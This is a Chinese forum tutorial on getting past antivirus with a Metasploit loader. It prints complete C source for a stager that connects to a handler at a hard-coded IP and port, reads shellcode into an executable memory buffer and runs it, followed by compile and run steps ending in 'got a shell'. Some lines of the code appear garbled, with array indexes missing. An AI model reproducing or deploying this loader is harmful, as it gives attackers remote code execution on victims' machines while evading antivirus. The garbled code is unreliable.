通过MSF加载器绕过AV
### 环境* Dev C ++
* kali 2020
### 获取
!(data/attachment/forum/202011/18/032309vxnfmuuu7uumv7vm.jpg?imageMogr2/auto-orient/strip%7CimageView2/2/w/300 "QQ鎴?浘20201118091149.jpg")
新建一个 `Project` 命名为`Loader64` 并将文件另存为 `Loader64`。
将 Project 设置为 `C Project`,将应用程序设置为` Console Application`。从命令行执行
!(data/attachment/forum/202011/18/032553cqwtrwg78887aiaf.jpg?imageMogr2/auto-orient/strip%7CimageView2/2/w/300 "44.jpg")
### 粘贴下面代码
```
/*
* A C-based stager client compat with the Metasploit Framework
* based on a discussion on the Metasploit Framework mailing list
*
* @author Raphael Mudge (raffi@strategiccyber.com)
* @license BSD License.
*
* Relevant messages:
* * http://mail.metasploit.com/pipermail/framework/2012-September/008660.html
* * http://mail.metasploit.com/pipermail/framework/2012-September/008664.html
*/
#include <stdio.h>
#include <stdlib.h>
#include <windows.h>
#include <winsock2.h>
/* init winsock */
void winsock_init() {
WSADATA wsaData;
WORD wVersionRequested;
wVersionRequested = MAKEWORD(2, 2);
if (WSAStartup(wVersionRequested, &wsaData) < 0) {
printf("ws2_32.dll is out of date.\n");
WSACleanup();
exit(1);
}
}
/* a quick routine to quit and report why we quit */
void punt(SOCKET my_socket, char * error) {
printf("Bad things: %s\n", error);
closesocket(my_socket);
WSACleanup();
exit(1);
}
/* attempt to receive all of the requested data from the socket */
int recv_all(SOCKET my_socket, void * buffer, int len) {
int tret = 0;
int nret = 0;
void * startb = buffer;
while (tret < len) {
nret = recv(my_socket, (char *)startb, len - tret, 0);
startb += nret;
tret += nret;
if (nret == SOCKET_ERROR)
punt(my_socket, "Could not receive data");
}
return tret;
}
/* establish a connection to a host:port */
SOCKET wsconnect(char * targetip, int port) {
struct hostent * target;
struct sockaddr_in sock;
SOCKET my_socket;
/* setup our socket */
my_socket = socket(AF_INET, SOCK_STREAM, 0);
if (my_socket == INVALID_SOCKET)
punt(my_socket, "Could not initialize socket");
/* resolve our target */
target = gethostbyname(targetip);
if (target == NULL)
punt(my_socket, "Could not resolve target");
/* copy our target information into the sock */
memcpy(&sock.sin_addr.s_addr, target->h_addr, target->h_length);
sock.sin_family = AF_INET;
sock.sin_port = htons(port);
/* attempt to connect */
if ( connect(my_socket, (struct sockaddr *)&sock, sizeof(sock)) )
punt(my_socket, "Could not connect to target");
return my_socket;
}
int main(int argc, char * argv[]) {
ULONG32 size;
char * buffer;
void (*function)();
winsock_init();
if (argc != 3) {
printf("%s \n", argv);
exit(1);
}
/* connect to the handler */
SOCKET my_socket = wsconnect("192.168.123.33", 5555);
/* read the 4-byte length */
int count = recv(my_socket, (char *)&size, 4, 0);
if (count != 4 || size <= 0)
punt(my_socket, "read a strange or incomplete length value\n");
/* allocate a RWX buffer */
buffer = VirtualAlloc(0, size + 10, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
if (buffer == NULL)
punt(my_socket, "could not allocate buffer\n");
/* prepend a little assembly to move our SOCKET value to the EDI register
thanks mihi for pointing this out
BF 78 56 34 12 => mov edi, 0x12345678 */
buffer = 0x48;
buffer = 0xBF;
/* copy the value of our socket to the buffer */
memcpy(buffer + 2, &my_socket, 8);
/* read bytes into the buffer */
count = recv_all(my_socket, buffer + 10, size);
/* cast our buffer as a function and call it */
function = (void (*)())buffer;
function();
return 0;
}
```
修改`SOCKET my_socket = wsconnect("192.168.123.33", 5555);`为你的IP和端口。
编译选项中添加`-lws2_32`
!(data/attachment/forum/202011/18/032858ecnuwzu69uu6muc9.jpg?imageMogr2/auto-orient/strip%7CimageView2/2/w/300 "66.jpg")
按`F9` 编译并在msf中监听!
在`cmd`中执行下面命令
```
Loader64.exe 192.168.123.33 5555
```
成功得到shell
### 免杀效果
页:
[1]